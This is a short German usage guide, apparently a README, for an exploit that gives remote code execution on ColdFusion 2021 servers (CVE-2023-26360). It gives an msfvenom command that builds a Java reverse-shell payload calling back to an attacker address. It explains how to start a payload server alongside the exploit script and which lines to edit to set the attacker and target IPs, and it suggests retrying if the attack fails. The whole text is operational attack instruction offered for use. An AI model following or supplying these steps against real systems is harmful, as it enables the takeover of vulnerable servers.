
Exploit für Remotecodeausführung in ColdFusion 2021 (CVE-2023-26360)
Manchmal funktionieren die Skripte nicht beim ersten Versuch. Versuchen Sie es ein paar Mal, damit es funktioniert
msfvenom -p java/shell_reverse_tcp LHOST=192.168.56.1 LPORT=4444 > file.java
server.pycve.2023-26360.py an den Coldfusion-Server, daher muss er zuerst gestartet werden.python3 server.py 8000
Das Argument 8000 ist der Port, auf dem der Server lauscht.
Es ist wichtig zu beachten, dass Zeile 12 die Server-IP-Adresse konfiguriert, also ändern Sie sie:
s.bind(('192.168.56.1',port))
cve-2023-26360.pypython3 cve-2023-26360.py 8000
Wie bei server.py ist das Argument 8000 der Port, auf dem server.py lauschen wird. Daher muss es in beiden Befehlen identisch sein.
Zeile 8 in cve-2023-26360.py legt die IP-Adresse fest, auf der server.py lauschen wird. Es ist notwendig, sie korrekt zu konfigurieren.
Zeile 11 in cve-2023-26360.py legt die IP-Adresse des Coldfusion-Servers fest, also ändern Sie sie:
url = "http://192.168.56.102:8500"